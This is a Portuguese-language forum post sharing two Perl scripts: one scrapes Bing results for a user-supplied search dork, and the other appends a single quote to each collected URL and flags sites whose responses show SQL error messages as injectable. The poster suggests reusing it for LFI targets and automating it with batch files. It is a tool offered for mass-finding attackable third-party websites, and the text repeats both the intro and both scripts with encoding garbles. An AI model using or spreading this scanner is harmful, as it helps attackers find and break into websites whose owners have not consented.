Eai pessoal.
Achei um script que usa o Bing pra pegar sites vulneráveis a SQLi e salvar em um arquivo txt. Dei uma olhada deixei do meu jeito
Funciona da seguinte forma:
Você usa o arquivo captura.pl para digitar o seu dork.
Já o arquivo scan.pl vai ver se o site é realmente vulnerável.
Os sites capturado serão salvos em um arquivo chamado Lista.txt
E os sites vulneráveis em outro arquivo chamado Lista2.txt
Para scanear a primeira lista digite no prompt de comando: scan.pl Lista.txt
Você pode usar o script pra pegar sites vuls a LFI, F-Open e muito mais e tbm pode criar um arquivo Batch para automatizar o processo =)
captura.pl:
scan.pl:
__________________________________________________ _________________
Lembrando que precisa do Active Perl para o script rodar.
Não sei quem é o autor do software
Achei um script que usa o Bing pra pegar sites vulneráveis a SQLi e salvar em um arquivo txt. Dei uma olhada deixei do meu jeito
Funciona da seguinte forma:
Você usa o arquivo captura.pl para digitar o seu dork.
Já o arquivo scan.pl vai ver se o site é realmente vulnerável.
Os sites capturado serão salvos em um arquivo chamado Lista.txt
E os sites vulneráveis em outro arquivo chamado Lista2.txt
Para scanear a primeira lista digite no prompt de comando: scan.pl Lista.txt
Você pode usar o script pra pegar sites vuls a LFI, F-Open e muito mais e tbm pode criar um arquivo Batch para automatizar o processo =)
captura.pl:
#!/usr/bin/perl
use LWP::UserAgent;
system("cls");
print "Sql Engine - Script Extrator de Dom¡nios\n";
print "By PoisonedApple\n" ;
print "\n";
print "Digite um dork";
print ": ";
$dork = <STDIN>;
print "\n";
print "Dork Utilizado: $dork";
chomp($dork);
for ($i = 0; $i < 1000; $i += 10) {
$b = LWP::UserAgent->new(agent => 'Mozilla/4.8 [en] (Windows NT 6.0; U)');
$b->timeout(30);
$b->env_proxy;
$c = $b->get('http://www.bing.com/search?q=' . $dork . '&first=' . $i . '&FORM=PERE')->content;
$check = index($c, 'sb_pagN');
while (1) {
$n = index($c, '<h3><a href="');
if ($n == -1) {
last;
}
$c = substr($c, $n + 13);
$s = substr($c, 0, index($c, '"'));
open (txt,">>Lista.txt");
print txt $s,"\n";
close(txt);
}
if ($check == -1) {
last;
}
}
system("Lista.txt");
exit;
use LWP::UserAgent;
system("cls");
print "Sql Engine - Script Extrator de Dom¡nios\n";
print "By PoisonedApple\n" ;
print "\n";
print "Digite um dork";
print ": ";
$dork = <STDIN>;
print "\n";
print "Dork Utilizado: $dork";
chomp($dork);
for ($i = 0; $i < 1000; $i += 10) {
$b = LWP::UserAgent->new(agent => 'Mozilla/4.8 [en] (Windows NT 6.0; U)');
$b->timeout(30);
$b->env_proxy;
$c = $b->get('http://www.bing.com/search?q=' . $dork . '&first=' . $i . '&FORM=PERE')->content;
$check = index($c, 'sb_pagN');
while (1) {
$n = index($c, '<h3><a href="');
if ($n == -1) {
last;
}
$c = substr($c, $n + 13);
$s = substr($c, 0, index($c, '"'));
open (txt,">>Lista.txt");
print txt $s,"\n";
close(txt);
}
if ($check == -1) {
last;
}
}
system("Lista.txt");
exit;
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
$sis="$^O";if ($sis eq linux){ $cmd="clear";} else { $cmd="cls"; }
system("$cmd");
if (!$ARGV[0]) {
$sis="$^O";if ($sis eq linux){ $cmd="clear";} else { $cmd="cls"; }
system("$cmd");
my @bannerzinho = (0,100..200);
my $variavelbanner = $bannerzinho[int rand @bannerzinho];
if ($variavelbanner % 2 == 0) {
&bannerUm();
exit;
}
else {
&bannerDois();
exit;
}
}
&bannerDois();
print q {
[+] Scaneando Websites...
[+] Sites Vulner*veis:
};
open( SITE, "< $ARGV[0]" ) or die( "NÆo foi poss¡vel abrir o arquivo." );
our @array = <SITE>;
$numero = $#array;
for ($i = 0; $i <= $numero; $i++) {
$Dominio = "$array[$i]";
if($Dominio !~ /http:\/\//) { $Dominio = "http://$Dominio"; }
$cmd = "'";
$site = "$Dominio$cmd";
my $req=HTTP::Request->new(GET=>$site);
my $ua=LWP::UserAgent->new();
$ua->timeout(15);
my $resposta=$ua->request($req);
if($resposta->content =~ /You have an error in your SQL syntax/ ||
$resposta->content =~ /MySQL server version/ ||
$resposta->content =~ /Syntax error converting the nvarchar value/ ||
$resposta->content =~ /Unclosed/ ||
$resposta->content =~ /SQL Server error/ ||
$resposta->content =~ /JET/) {
print "\n \t $Dominio \n";
open (NOTEPAD, ">> Lista2.txt");
print NOTEPAD "$site\n";
close(NOTEPAD);
open (NOTEPAD, "<Lista2.txt");
}
}
print q {
[+] Scaneamento Concluido !
};
sub bannerUm {
print q {
:::::::::::::::::::::::::::::::::::::::
:: Sql Engine ::
:: ::
:: By PoisonedApple ::
:::::::::::::::::::::::::::::::::::::::
[+] VersÆo 1.0
};
}
sub bannerDois {
print q {
:::::::::::::::::::::::::::::::::::::::
:: Sql Engine ::
:: ::
:: By PoisonedApple ::
:::::::::::::::::::::::::::::::::::::::
[+] VersÆo 1.0
};
}
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
$sis="$^O";if ($sis eq linux){ $cmd="clear";} else { $cmd="cls"; }
system("$cmd");
if (!$ARGV[0]) {
$sis="$^O";if ($sis eq linux){ $cmd="clear";} else { $cmd="cls"; }
system("$cmd");
my @bannerzinho = (0,100..200);
my $variavelbanner = $bannerzinho[int rand @bannerzinho];
if ($variavelbanner % 2 == 0) {
&bannerUm();
exit;
}
else {
&bannerDois();
exit;
}
}
&bannerDois();
print q {
[+] Scaneando Websites...
[+] Sites Vulner*veis:
};
open( SITE, "< $ARGV[0]" ) or die( "NÆo foi poss¡vel abrir o arquivo." );
our @array = <SITE>;
$numero = $#array;
for ($i = 0; $i <= $numero; $i++) {
$Dominio = "$array[$i]";
if($Dominio !~ /http:\/\//) { $Dominio = "http://$Dominio"; }
$cmd = "'";
$site = "$Dominio$cmd";
my $req=HTTP::Request->new(GET=>$site);
my $ua=LWP::UserAgent->new();
$ua->timeout(15);
my $resposta=$ua->request($req);
if($resposta->content =~ /You have an error in your SQL syntax/ ||
$resposta->content =~ /MySQL server version/ ||
$resposta->content =~ /Syntax error converting the nvarchar value/ ||
$resposta->content =~ /Unclosed/ ||
$resposta->content =~ /SQL Server error/ ||
$resposta->content =~ /JET/) {
print "\n \t $Dominio \n";
open (NOTEPAD, ">> Lista2.txt");
print NOTEPAD "$site\n";
close(NOTEPAD);
open (NOTEPAD, "<Lista2.txt");
}
}
print q {
[+] Scaneamento Concluido !
};
sub bannerUm {
print q {
:::::::::::::::::::::::::::::::::::::::
:: Sql Engine ::
:: ::
:: By PoisonedApple ::
:::::::::::::::::::::::::::::::::::::::
[+] VersÆo 1.0
};
}
sub bannerDois {
print q {
:::::::::::::::::::::::::::::::::::::::
:: Sql Engine ::
:: ::
:: By PoisonedApple ::
:::::::::::::::::::::::::::::::::::::::
[+] VersÆo 1.0
};
}
Lembrando que precisa do Active Perl para o script rodar.
Não sei quem é o autor do software
Comment